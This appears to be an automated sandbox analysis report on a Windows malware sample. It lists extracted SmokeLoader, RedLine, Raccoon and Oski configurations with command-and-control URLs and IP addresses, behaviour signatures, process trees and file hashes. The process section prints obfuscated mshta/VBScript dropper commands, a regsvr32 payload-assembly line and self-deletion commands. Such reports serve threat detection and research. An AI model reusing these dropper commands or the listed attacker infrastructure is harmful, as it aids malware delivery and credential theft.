Analysis
max time kernel
158s
max time network
154s
platform
windows10_x64
resource
win10-en-20211104
submitted
13-11-2021 19:21
Static task
static1
Behavioral task
behavioral1
Sample
afdebbe310efbf8ebc01012495dba839.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
afdebbe310efbf8ebc01012495dba839.exe
Resource
win10-en-20211104
General
-
Target
afdebbe310efbf8ebc01012495dba839.exe
-
Size
317KB
-
MD5
afdebbe310efbf8ebc01012495dba839
-
SHA1
4107fbed949f1c820da21072f94ead291052e572
-
SHA256
d5c05cd26342688768185f72a797e379fccea0ced4b49af77770a632f0601166
-
SHA512
dab287c424767bdaa4f5fb936062b20b80e2d8889e8236d6607fa700bb0fd777fa159126d1ec97fcdc6b22c4ce51e50a00b401b0c301896d06941237cd8f62c1
Malware Config
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
redline
185.159.80.90:38637
Extracted
redline
SuperStar
185.215.113.29:36224
Extracted
raccoon
1.8.3-hotfix
675718a5f2ce6d3cacf6cb04a512f5637eae995f
-
url4cnc
http://91.219.236.27/agrybirdsgamerept
http://5.181.156.92/agrybirdsgamerept
http://91.219.236.207/agrybirdsgamerept
http://185.225.19.18/agrybirdsgamerept
http://91.219.237.227/agrybirdsgamerept
http://185.163.47.176/agrybirdsgamerept
Extracted
oski
takpo.biz
Signatures
-
Oski
Oski is an infostealer targeting browser data and cryptocurrency wallets.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource | yara_rule
behavioral2/memory/432-145-0x0000000000418EEA-mapping.dmp | family_redline
behavioral2/memory/432-144-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
behavioral2/memory/888-166-0x0000000002370000-0x000000000238C000-memory.dmp | family_redline
behavioral2/memory/888-168-0x00000000024C0000-0x00000000024DB000-memory.dmp | family_redline
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
description | pid | process | target process
PID 2120 created 1440 | 2120 | WerFault.exe | 6707.exe
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
Downloads MZ/PE file
-
Executes dropped EXE 13 IoCs
Processes:
pid | process
2252 | 3BEC.exe
3688 | 4081.exe
1804 | 438F.exe
2664 | 4B50.exe
432 | 4081.exe
3192 | 3BEC.exe
888 | 4B50.exe
1440 | 6707.exe
2316 | Grindstone.exe
3160 | Grindstone.exe
3092 | Grindstone.exe
3908 | D4F5.exe
3876 | SIOFYL_.eXE
-
Deletes itself 1 IoCs
Processes:
pid | process
3028 |
-
Loads dropped DLL 3 IoCs
Processes:
pid | process
3092 | Grindstone.exe
3092 | Grindstone.exe
3092 | Grindstone.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe
Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe
Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 5 IoCs
Processes:
description | pid | process | target process
PID 1424 set thread context of 588 | 1424 | afdebbe310efbf8ebc01012495dba839.exe | afdebbe310efbf8ebc01012495dba839.exe
PID 3688 set thread context of 432 | 3688 | 4081.exe | 4081.exe
PID 2252 set thread context of 3192 | 2252 | 3BEC.exe | 3BEC.exe
PID 2664 set thread context of 888 | 2664 | 4B50.exe | 4B50.exe
PID 2316 set thread context of 3092 | 2316 | Grindstone.exe | Grindstone.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
pid | pid_target | process | target process
2120 | 1440 | WerFault.exe | 6707.exe
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | afdebbe310efbf8ebc01012495dba839.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | afdebbe310efbf8ebc01012495dba839.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | afdebbe310efbf8ebc01012495dba839.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 438F.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 438F.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 438F.exe
-
Checks processor information in registry 2 TTPs 1 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Grindstone.exe
-
Kills process with taskkill 2 IoCs
Processes:
pid | process
2392 | taskkill.exe
4012 | taskkill.exe
-
Modifies registry class 2 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance |
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance |
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
588 | afdebbe310efbf8ebc01012495dba839.exe
588 | afdebbe310efbf8ebc01012495dba839.exe
3028 |  (this entry is repeated 62 times; no process name recorded)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
3028 |
-
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
pid | process
588 | afdebbe310efbf8ebc01012495dba839.exe
1804 | 438F.exe
3028 |  (this entry is repeated 4 times)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeShutdownPrivilege | 3028 |
Token: SeCreatePagefilePrivilege | 3028 |
(the two rows above alternate 8 times)
Token: SeRestorePrivilege | 2120 | WerFault.exe
Token: SeBackupPrivilege | 2120 | WerFault.exe
Token: SeDebugPrivilege | 2120 | WerFault.exe
Token: SeShutdownPrivilege | 3028 |
Token: SeCreatePagefilePrivilege | 3028 |
(the two rows above alternate 2 times)
Token: SeDebugPrivilege | 432 | 4081.exe
Token: SeShutdownPrivilege | 3028 |
Token: SeCreatePagefilePrivilege | 3028 |
(the two rows above alternate 11 times)
Token: SeDebugPrivilege | 2392 | taskkill.exe
Token: SeDebugPrivilege | 4012 | taskkill.exe
Token: SeShutdownPrivilege | 3028 |
Token: SeCreatePagefilePrivilege | 3028 |
(the two rows above alternate 8 times)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 1424 wrote to memory of 588 | 1424 | afdebbe310efbf8ebc01012495dba839.exe | afdebbe310efbf8ebc01012495dba839.exe  (6 times)
PID 3028 wrote to memory of 2252 | 3028 |  | 3BEC.exe  (3 times)
PID 3028 wrote to memory of 3688 | 3028 |  | 4081.exe  (3 times)
PID 3028 wrote to memory of 1804 | 3028 |  | 438F.exe  (3 times)
PID 3688 wrote to memory of 432 | 3688 | 4081.exe | 4081.exe  (3 times)
PID 3028 wrote to memory of 2664 | 3028 |  | 4B50.exe  (3 times)
PID 3688 wrote to memory of 432 | 3688 | 4081.exe | 4081.exe  (5 times)
PID 2252 wrote to memory of 3192 | 2252 | 3BEC.exe | 3BEC.exe  (6 times)
PID 2664 wrote to memory of 888 | 2664 | 4B50.exe | 4B50.exe  (9 times)
PID 3028 wrote to memory of 1440 | 3028 |  | 6707.exe  (3 times)
PID 432 wrote to memory of 2316 | 432 | 4081.exe | Grindstone.exe  (3 times)
PID 2316 wrote to memory of 3160 | 2316 | Grindstone.exe | Grindstone.exe  (3 times)
PID 2316 wrote to memory of 3092 | 2316 | Grindstone.exe | Grindstone.exe  (9 times)
PID 3028 wrote to memory of 3908 | 3028 |  | D4F5.exe  (3 times)
PID 3908 wrote to memory of 1676 | 3908 | D4F5.exe | mshta.exe  (2 times)
-
outlook_office_path 1 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe
-
outlook_win_path 1 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\afdebbe310efbf8ebc01012495dba839.exe (depth 1)
command line: "C:\Users\Admin\AppData\Local\Temp\afdebbe310efbf8ebc01012495dba839.exe"
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\afdebbe310efbf8ebc01012495dba839.exe (depth 2)
command line: "C:\Users\Admin\AppData\Local\Temp\afdebbe310efbf8ebc01012495dba839.exe"
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\3BEC.exe (depth 1)
command line: C:\Users\Admin\AppData\Local\Temp\3BEC.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3BEC.exe (depth 2)
command line: C:\Users\Admin\AppData\Local\Temp\3BEC.exe
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\4081.exe (depth 1)
command line: C:\Users\Admin\AppData\Local\Temp\4081.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\4081.exe (depth 2)
command line: C:\Users\Admin\AppData\Local\Temp\4081.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Grindstone.exe (depth 3)
command line: "C:\Users\Admin\AppData\Local\Temp\Grindstone.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Grindstone.exe (depth 4)
command line: C:\Users\Admin\AppData\Local\Temp\Grindstone.exe
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Grindstone.exe (depth 4)
command line: C:\Users\Admin\AppData\Local\Temp\Grindstone.exe
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe (depth 5)
command line: "C:\Windows\System32\cmd.exe" /c taskkill /pid 3092 & erase C:\Users\Admin\AppData\Local\Temp\Grindstone.exe & RD /S /Q C:\\ProgramData\\421991453715149\\* & exit
-
C:\Windows\SysWOW64\taskkill.exe (depth 6)
command line: taskkill /pid 3092
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\438F.exe (depth 1)
command line: C:\Users\Admin\AppData\Local\Temp\438F.exe
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\4B50.exe (depth 1)
command line: C:\Users\Admin\AppData\Local\Temp\4B50.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\4B50.exe (depth 2)
command line: C:\Users\Admin\AppData\Local\Temp\4B50.exe
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\6707.exe (depth 1)
command line: C:\Users\Admin\AppData\Local\Temp\6707.exe
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 868
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\D4F5.exe (depth 1)
command line: C:\Users\Admin\AppData\Local\Temp\D4F5.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe (depth 2)
command line: "C:\Windows\System32\mshta.exe" vbscRiPt: cLoSE ( CreaTEObJect("WSCrIpt.ShElL" ).Run ( "CMd.EXe /Q/c COPY /Y ""C:\Users\Admin\AppData\Local\Temp\D4F5.exe"" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk &IF """"== """" for %S IN ( ""C:\Users\Admin\AppData\Local\Temp\D4F5.exe"" ) do taskkill -f /iM ""%~NXS"" " , 0 , TrUE ))
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
command line: "C:\Windows\System32\cmd.exe" /Q/c COPY /Y "C:\Users\Admin\AppData\Local\Temp\D4F5.exe" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk &IF ""== "" for %S IN ("C:\Users\Admin\AppData\Local\Temp\D4F5.exe" ) do taskkill -f /iM "%~NXS"
-
C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE (depth 4)
command line: ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe (depth 5)
command line: "C:\Windows\System32\mshta.exe" vbscRiPt: cLoSE ( CreaTEObJect("WSCrIpt.ShElL" ).Run ( "CMd.EXe /Q/c COPY /Y ""C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE"" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk &IF ""/PqgNvw4IlDLT7hpq3_wecIlKVwsIMk ""== """" for %S IN ( ""C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE"" ) do taskkill -f /iM ""%~NXS"" " , 0 , TrUE ))
-
C:\Windows\SysWOW64\cmd.exe (depth 6)
command line: "C:\Windows\System32\cmd.exe" /Q/c COPY /Y "C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk &IF "/PqgNvw4IlDLT7hpq3_wecIlKVwsIMk "== "" for %S IN ("C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE" ) do taskkill -f /iM "%~NXS"
-
C:\Windows\SysWOW64\mshta.exe (depth 5)
command line: "C:\Windows\System32\mshta.exe" VbscrIPT: cLOSE(cREateObJeCt( "wscRiPt.SHELl"). Run ("cMd /r Echo | set /P = ""MZ"" > V_DXQ.No & COPY /y /b V_dXQ.NO +WX0Cjy.A + BPROiU.ZB +oWfJ6VGN.C+ Yg_AN9.GRP ..\CXSXSHYX.ZBV & STARt regsvr32 ..\CxSXSHYX.ZBV -s & dEL /q * " ,0 ,tRuE ) )
-
C:\Windows\SysWOW64\cmd.exe (depth 6)
command line: "C:\Windows\System32\cmd.exe" /r Echo | set /P = "MZ" > V_DXQ.No & COPY /y /b V_dXQ.NO +WX0Cjy.A + BPROiU.ZB +oWfJ6VGN.C+ Yg_AN9.GRP ..\CXSXSHYX.ZBV & STARt regsvr32 ..\CxSXSHYX.ZBV -s & dEL /q *
-
C:\Windows\SysWOW64\cmd.exe (depth 7)
command line: C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>V_DXQ.No"
-
C:\Windows\SysWOW64\cmd.exe (depth 7)
command line: C:\Windows\system32\cmd.exe /S /D /c" Echo "
-
C:\Windows\SysWOW64\regsvr32.exe (depth 7)
command line: regsvr32 ..\CxSXSHYX.ZBV -s
-
C:\Windows\SysWOW64\taskkill.exe (depth 4)
command line: taskkill -f /iM "D4F5.exe"
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exe (depth 1)
command line: C:\Windows\SysWOW64\explorer.exe
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Windows\explorer.exe (depth 1)
command line: C:\Windows\explorer.exe
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4081.exe.log
MD5
41fbed686f5700fc29aaccf83e8ba7fd
SHA1
5271bc29538f11e42a3b600c8dc727186e912456
SHA256
df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512
234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034
-
C:\Users\Admin\AppData\Local\Temp\3BEC.exe
MD5
2d4410f782307ab67ca3b6066e3d4f6a
SHA1
fe709823cf9479cf93511a96d43b1d600b99493e
SHA256
94563a2bb64b9bf3e490739a1214abeb30f23a24ebf4230b1feb13a26b83e6ca
SHA512
1789fee92cad1d1a95467dcb08f87d556d66a2aeb17d95da1a2ae228751544418c140c139ba809920e5cc5e975b7011b4ce30e9adc2597d44035da7765c0f0d2
-
C:\Users\Admin\AppData\Local\Temp\4081.exe
MD5
e922d31d9e42823f27cb8512b3afe7ac
SHA1
c3acff8045e6ab4668894f9b0a42c274a654b2d8
SHA256
18e784c6c045e8bc45a1a2c06d6013ef712cfd63f9b5843e31911fdf1a27a872
SHA512
e9420bf7113c8be1addb736bfd8051327325256e5f03f83d6851b1f25883df39fe62bfa75b9f7ebab2002aedf1bc281f9f3cbdd44b7b7194adeb4e2789f73ac8
-
C:\Users\Admin\AppData\Local\Temp\438F.exe
MD5
d985b4cfdceecc3c0fe4f3e4fda4e416
SHA1
f3c14a4d87569e54faaf0eac73ec1aafa2621dfa
SHA256
a8b37d6b073ee045ae63473cb1a592c974e896b19e3db06d552f955901c06db7
SHA512
560a056c076db6893f6407807d9a10d1078c148aa588d9de6ce1874eeac0a4feaf2102b656ba96316a32c89df97986f20cf77e55117e2c9bf97e52ef3381335c
-
C:\Users\Admin\AppData\Local\Temp\4B50.exe
MD5
410152194464a8763cea1ea21a9a9fa8
SHA1
3caa9890777a02af28d2af1cb96f9dd7e03547f6
SHA256
f5babf8077d42050247f770eaa799f80c13499d427323952029a0ea3142321c3
SHA512
784bd8136f380fd40ca7614359c8ab1430adcc495561f7e38285c59d94af0e48d4a1984971c700475ce89015b63c1f6d065f4dc827ecc6323422701adad6247b
-
C:\Users\Admin\AppData\Local\Temp\6707.exe
MD5
0f2a6f61a47538be61905d63752a94aa
SHA1
b20645d2b6ed7249b40ce74ef7185ebb66e55032
SHA256
d3f1428295f9ad3e09608c041783a5d9a3e246b05412dd7708ca5dacf45da322
SHA512
125f20e9b369c4bb5407b8965d60b534b6d1cefc670299a101c2acf748083e6934cebb962b31b661797406bfbb94ed9a69e32cc2677754a537e9686601bd9c69
-
C:\Users\Admin\AppData\Local\Temp\D4F5.exe
MD5
57861feb58cc7432fc9191f26beac607
SHA1
e76e9ea41e4cf2f5869bbf696e216e688fb7b82b
SHA256
1c48f756080c780600c8eb59f9d10bc5f22b0ce2245687c9f51d6c2455a07a4e
SHA512
0ccfb8364049473e1c36825ad009570ce68ba689a2de9e4f02688a44b508fe9f075e83e6c8d2a7d2c8d62cbf99c7054b0cc226ab6637fe816764f708a05bcfeb
-
C:\Users\Admin\AppData\Local\Temp\Grindstone.exe
MD5
7e400451e3153f07e15e9079b8bed063
SHA1
864298a6817176e36a756721f48e5ac9dee0223e
SHA256
7ba90aa0c59065b2cff53772013ce986674346b311025c13eefff32670d7ffe1
SHA512
277edc6d5931d7b5b41d77a79cf975e2065d74d3ed938153d31f709670cbf03744109b4c6fa967dc229865e1dc49aa62b4503b0230d61f2f824d4012c5e97556
-
C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE
MD5
57861feb58cc7432fc9191f26beac607
SHA1
e76e9ea41e4cf2f5869bbf696e216e688fb7b82b
SHA256
1c48f756080c780600c8eb59f9d10bc5f22b0ce2245687c9f51d6c2455a07a4e
SHA512
0ccfb8364049473e1c36825ad009570ce68ba689a2de9e4f02688a44b508fe9f075e83e6c8d2a7d2c8d62cbf99c7054b0cc226ab6637fe816764f708a05bcfeb
-
\ProgramData\mozglue.dll
MD5
8f73c08a9660691143661bf7332c3c27
SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
-
\ProgramData\nss3.dll
MD5
bfac4e3c5908856ba17d41edcd455a51
SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
\ProgramData\sqlite3.dll
MD5
e477a96c8f2b18d6b5c27bde49c990bf
SHA1
e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256
16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512
335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c
-
memory/432-145-0x0000000000418EEA-mapping.dmp
-
memory/432-162-0x0000000005300000-0x0000000005906000-memory.dmp
Filesize
6.0MB
-
memory/432-149-0x0000000005910000-0x0000000005911000-memory.dmp
Filesize
4KB
-
memory/432-191-0x00000000075B0000-0x00000000075B1000-memory.dmp
Filesize
4KB
-
memory/432-190-0x0000000006EB0000-0x0000000006EB1000-memory.dmp
Filesize
4KB
-
memory/432-184-0x0000000005740000-0x0000000005741000-memory.dmp
Filesize
4KB
-
memory/432-155-0x0000000005380000-0x0000000005381000-memory.dmp
Filesize
4KB
-
memory/432-156-0x00000000054B0000-0x00000000054B1000-memory.dmp
Filesize
4KB
-
memory/432-144-0x0000000000400000-0x0000000000420000-memory.dmp
Filesize
128KB
-
memory/432-177-0x0000000005440000-0x0000000005441000-memory.dmp
Filesize
4KB
-
memory/432-188-0x00000000069C0000-0x00000000069C1000-memory.dmp
Filesize
4KB
-
memory/432-165-0x00000000053E0000-0x00000000053E1000-memory.dmp
Filesize
4KB
-
memory/588-121-0x0000000000402DD8-mapping.dmp
-
memory/588-120-0x0000000000400000-0x0000000000409000-memory.dmp
Filesize
36KB
-
memory/764-221-0x0000000000000000-mapping.dmp
-
memory/888-160-0x000000000040CD2F-mapping.dmp
-
memory/888-164-0x0000000000400000-0x0000000000433000-memory.dmp
Filesize
204KB
-
memory/888-181-0x0000000004B44000-0x0000000004B46000-memory.dmp
Filesize
8KB
-
memory/888-166-0x0000000002370000-0x000000000238C000-memory.dmp
Filesize
112KB
-
memory/888-168-0x00000000024C0000-0x00000000024DB000-memory.dmp
Filesize
108KB
-
memory/888-170-0x0000000004B42000-0x0000000004B43000-memory.dmp
Filesize
4KB
-
memory/888-171-0x0000000004B43000-0x0000000004B44000-memory.dmp
Filesize
4KB
-
memory/888-169-0x0000000004B40000-0x0000000004B41000-memory.dmp
Filesize
4KB
-
memory/888-158-0x0000000000400000-0x0000000000433000-memory.dmp
Filesize
204KB
-
memory/1096-238-0x0000000004720000-0x00000000047CD000-memory.dmp
Filesize
692KB
-
memory/1096-239-0x00000000047D0000-0x0000000004869000-memory.dmp
Filesize
612KB
-
memory/1096-236-0x00000000044E0000-0x0000000004595000-memory.dmp
Filesize
724KB
-
memory/1096-237-0x0000000004660000-0x0000000004714000-memory.dmp
Filesize
720KB
-
memory/1096-235-0x0000000000D10000-0x0000000000EE0000-memory.dmp
Filesize
1.8MB
-
memory/1412-232-0x0000000000000000-mapping.dmp
-
memory/1424-119-0x0000000002C80000-0x0000000002DCA000-memory.dmp
Filesize
1.3MB
-
memory/1440-185-0x0000000004830000-0x00000000048BF000-memory.dmp
Filesize
572KB
-
memory/1440-186-0x0000000000400000-0x0000000002B85000-memory.dmp
Filesize
39.5MB
-
memory/1440-176-0x0000000000000000-mapping.dmp
-
memory/1492-230-0x0000000000000000-mapping.dmp
-
memory/1492-233-0x0000000000E80000-0x0000000000E87000-memory.dmp
Filesize
28KB
-
memory/1492-234-0x0000000000BF0000-0x0000000000BFC000-memory.dmp
Filesize
48KB
-
memory/1676-215-0x0000000000000000-mapping.dmp
-
memory/1804-142-0x0000000000530000-0x000000000067A000-memory.dmp
Filesize
1.3MB
-
memory/1804-131-0x0000000000000000-mapping.dmp
-
memory/1804-143-0x0000000000400000-0x0000000000433000-memory.dmp
Filesize
204KB
-
memory/1804-141-0x0000000000530000-0x000000000067A000-memory.dmp
Filesize
1.3MB
-
memory/2252-123-0x0000000000000000-mapping.dmp
-
memory/2252-154-0x0000000002CA0000-0x0000000002CA9000-memory.dmp
Filesize
36KB
-
memory/2316-192-0x0000000000000000-mapping.dmp
-
memory/2316-195-0x0000000000560000-0x0000000000561000-memory.dmp
Filesize
4KB
-
memory/2316-201-0x0000000004FE0000-0x0000000004FE1000-memory.dmp
Filesize
4KB
-
memory/2392-223-0x0000000000000000-mapping.dmp
-
memory/2492-225-0x0000000000000000-mapping.dmp
-
memory/2664-138-0x0000000000000000-mapping.dmp
-
memory/2664-163-0x0000000002B60000-0x0000000002CAA000-memory.dmp
Filesize
1.3MB
-
memory/2664-157-0x0000000002EA6000-0x0000000002EC9000-memory.dmp
Filesize
140KB
-
memory/2680-218-0x0000000000000000-mapping.dmp
-
memory/2680-228-0x0000000002D90000-0x0000000002DFB000-memory.dmp
Filesize
428KB
-
memory/2680-227-0x0000000003000000-0x0000000003074000-memory.dmp
Filesize
464KB
-
memory/2804-231-0x0000000000000000-mapping.dmp
-
memory/2824-216-0x0000000000000000-mapping.dmp
-
memory/3028-159-0x0000000002510000-0x0000000002526000-memory.dmp
Filesize
88KB
-
memory/3028-122-0x0000000000AD0000-0x0000000000AE6000-memory.dmp
Filesize
88KB
-
memory/3092-203-0x0000000000400000-0x0000000000438000-memory.dmp
Filesize
224KB
-
memory/3092-204-0x000000000040717B-mapping.dmp
-
memory/3092-206-0x0000000000400000-0x0000000000438000-memory.dmp
Filesize
224KB
-
memory/3192-152-0x0000000000402DD8-mapping.dmp
-
memory/3620-229-0x0000000000000000-mapping.dmp
-
memory/3688-126-0x0000000000000000-mapping.dmp
-
memory/3688-129-0x0000000000390000-0x0000000000391000-memory.dmp
Filesize
4KB
-
memory/3688-137-0x00000000025A0000-0x00000000025A1000-memory.dmp
Filesize
4KB
-
memory/3688-136-0x00000000051F0000-0x00000000051F1000-memory.dmp
Filesize
4KB
-
memory/3688-132-0x0000000004C40000-0x0000000004C41000-memory.dmp
Filesize
4KB
-
memory/3688-135-0x0000000002580000-0x0000000002581000-memory.dmp
Filesize
4KB
-
memory/3876-222-0x0000000000370000-0x0000000000371000-memory.dmp
Filesize
4KB
-
memory/3876-220-0x0000000000370000-0x0000000000371000-memory.dmp
Filesize
4KB
-
memory/3876-217-0x0000000000000000-mapping.dmp
-
memory/3908-212-0x0000000002EF0000-0x0000000002EF1000-memory.dmp
Filesize
4KB
-
memory/3908-213-0x0000000002EF0000-0x0000000002EF1000-memory.dmp
Filesize
4KB
-
memory/3908-210-0x0000000000000000-mapping.dmp
-
memory/4012-226-0x0000000000000000-mapping.dmp